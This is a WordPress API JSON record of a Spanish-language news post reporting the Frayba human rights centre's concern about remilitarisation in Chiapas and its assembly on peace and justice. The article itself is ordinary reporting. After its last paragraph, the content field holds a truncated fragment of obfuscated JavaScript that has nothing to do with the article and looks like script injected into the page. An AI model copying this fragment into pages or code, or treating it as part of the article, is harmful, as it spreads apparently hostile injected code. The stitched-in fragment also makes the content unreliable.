{"id":11292,"date":"2023-08-12T01:22:16","date_gmt":"2023-08-12T01:22:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11292"},"modified":"2023-08-12T01:22:16","modified_gmt":"2023-08-12T01:22:16","slug":"preocupa-al-frayba-creciente-proceso-de-remilitarizacion-y-militarismo-que-se-vive-en-el-pais","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11292","title":{"rendered":"Preocupa al Frayba creciente proceso de remilitarizaci\u00f3n y militarismo que se vive en el pa\u00eds"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"850\" height=\"567\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-11-at-10.53.48-AM.jpeg\" alt=\"\" class=\"wp-image-11293\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-11-at-10.53.48-AM.jpeg 850w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-11-at-10.53.48-AM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/WhatsApp-Image-2023-08-11-at-10.53.48-AM-768x512.jpeg 768w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- &#8220;Nos preocupa el creciente proceso de remilitarizaci\u00f3n y militarismo que se vive en el pa\u00eds, especialmente en Chiapas y la regi\u00f3n sureste, cuyo territorio es de una gran relevancia geoestrat\u00e9gica para las obras de infraestructura del gobierno mexicano que lleva en su esencia la continuidad del despojo hacia los pueblos (Tren Maya, Corredor interoce\u00e1nico del Itsmo de Tehuantepec y la Refiner\u00eda Olmeca en Dos Bocas)&#8221;.<\/p>\n\n\n\n<p>As\u00ed lo manifest\u00f3 el Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas (Frayba), quienes informaron que llevaron a cabo la Segunda Asamblea \u201cTejiendo caminos hacia la paz, la Otra Justicia y la Vida\u201d, los d\u00edas 7 y 8 de agosto de 2023, donde reflexionaron el contexto actual y los desaf\u00edos para la defensa de la vida y el ejercicio de los derechos humanos en Chiapas.<\/p>\n\n\n\n<p>En un pronunciamiento emitido como resultado de este encuentro, se\u00f1alan que durante los \u00faltimos a\u00f1os, han atestiguado un escalamiento y diversificaci\u00f3n de las violencias en Chiapas, &#8220;con enormes costos sociales, humanos y de los bienes comunes, as\u00ed como profundos impactos en la vida de las comunidades, especialmente de los pueblos originarios, las juventudes y personas migrantes, aumentando tambi\u00e9n los riesgos para la labor de las personas defensoras de derechos humanos y periodistas&#8221;.<\/p>\n\n\n\n<p>Como Frayba afirma que mantienen el compromiso de caminar y no dejar de acompa\u00f1ar por los pueblos, con quienes han tejido alianzas y redes para la vida&#8221; encontramos en nuestra memoria hist\u00f3rica y viva, las claves de las resistencias profundas para el mundo que anhelamos construir&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- &#8220;Nos preocupa el creciente proceso de remilitarizaci\u00f3n y militarismo que se vive en el pa\u00eds, especialmente en Chiapas y la regi\u00f3n sureste, cuyo territorio es de una gran relevancia geoestrat\u00e9gica para las obras de infraestructura del gobierno mexicano que lleva en su esencia la continuidad del despojo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11293,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11292","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11292"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11292\/revisions"}],"predecessor-version":[{"id":11294,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11292\/revisions\/11294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11293"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}